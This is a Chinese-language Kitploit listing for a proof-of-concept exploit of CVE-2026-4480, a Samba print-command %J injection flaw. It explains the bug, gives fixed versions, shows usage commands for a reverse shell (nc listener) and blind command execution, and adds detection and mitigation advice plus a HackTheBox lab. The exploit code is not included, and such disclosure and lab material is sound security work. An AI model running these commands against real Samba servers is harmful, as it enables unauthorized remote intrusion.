Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-4480-PoC — CVE-2026-4480 的概念验证漏洞利用程序,该漏洞是 Samba 打印子系统中通过 %J 注入实现的无认证远程命令执行漏洞。包含反向 Shell 和盲命令执行模式,并提供检测与缓解指南。 | Kitploit
工具/GitHubGitHub/thecybergeek/cve-2026-4480-poc
漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育实验室与实践
GitHubthecybergeek/cve-2026-4480-poc

CVE-2026-4480-PoC

CVE-2026-4480 的概念验证漏洞利用程序,该漏洞是 Samba 打印子系统中通过 %J 注入实现的无认证远程命令执行漏洞。包含反向 Shell 和盲命令执行模式,并提供检测与缓解指南。

查看仓库
21533个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-4480:Samba print-command (%J) 注入 PoC

重要——请先阅读:
此仓库及 exploit.py 仅提供用于教育和研究目的。请不要将本代码用于你未获得明确书面授权的系统、网络或服务。未经授权访问计算机系统属违法行为且不合伦理。使用本代码即表示你同意遵守适用法律和机构政策。

未经身份验证的远程命令执行,位于 Samba 打印子系统中。当打印任务完成假脱机时,Samba 通过 system() 运行配置的 print command,将 %s(假脱机文件路径)和 %J(客户端提供的任务名称)替换到字符串中。在修复之前,任务名称仅经过单一转换 ' → _,而 |、;、&、空格、<、> 和反引号均原封不动地传给 shell。因此,引用 %J 的 print command 成为了 shell 注入的入口,且由于访客可以提交打印任务,该问题属于预先身份验证。

  • CVE: CVE-2026-4480
  • CVSS: 10.0
  • 修复版本: Samba 4.22.10、4.23.8、4.24.3
  • 受影响: 运行引用 %J 的外部 print command 的打印后端(printing = sysv 风格)。printing = cups / iprint 走 CUPS API,不受影响。

要求

  • 装有 Samba Python 绑定的 Linux:
    root@kitploit:~
    sudo apt install python3-samba
    
  • 对目标的 SMB 端口(445/139)的网络访问。
  • 目标上存在一个访客可访问的打印机共享,其 print command 引用了 %J。

使用

root@kitploit:~
python3 exploit.py <rhost> <lhost> <lport> [-P PRINTER] [-c CMD]

反弹 shell

root@kitploit:~
# 终端 1:监听
nc -lvnp 4444

# 终端 2:触发漏洞
python3 exploit.py 10.129.244.177 10.10.14.100 4444

你应能以打印服务账户(例如 nobody)获得 shell。

运行单条命令(盲执行)

root@kitploit:~
python3 exploit.py 10.129.244.177 x x -c 'id > /dev/shm/o 2>&1'

由于执行是盲的(命令在服务器端运行,RPC 通道上不返回任何信息),请先通过带外方式确认,例如使用 tcpdump -ni tun0 icmp 观察 ICMP 回显:

root@kitploit:~
python3 exploit.py 10.129.244.177 x x -c 'ping -c 3 10.10.14.100'

检测/缓解

  • 升级至 4.22.10 / 4.23.8 / 4.24.3(或更高版本)。
  • 若无法升级,为宏加引号:print command = /usr/local/bin/print-helper %s '%J',去掉 %J,或改用 printing = cups。
  • 监控 smbd 生成 shell(sh/bash/nc/python/curl)以及包含 shell 元字符的文档名称。

在 HackTheBox 上练习

我在 HackTheBox 上创建了一个名为 Abducted 的盒子,用于展示该漏洞,并让你亲手体验攻击者如何在配置不当的环境中利用此漏洞。

下载工具
参数/选项含义
rhost目标 Samba 主机/IP
lhost你的监听 IP
lport你的监听端口
-P, --printer访客打印机共享名(默认:HP-Reception)
-c, --cmd运行任意命令而非反弹 shell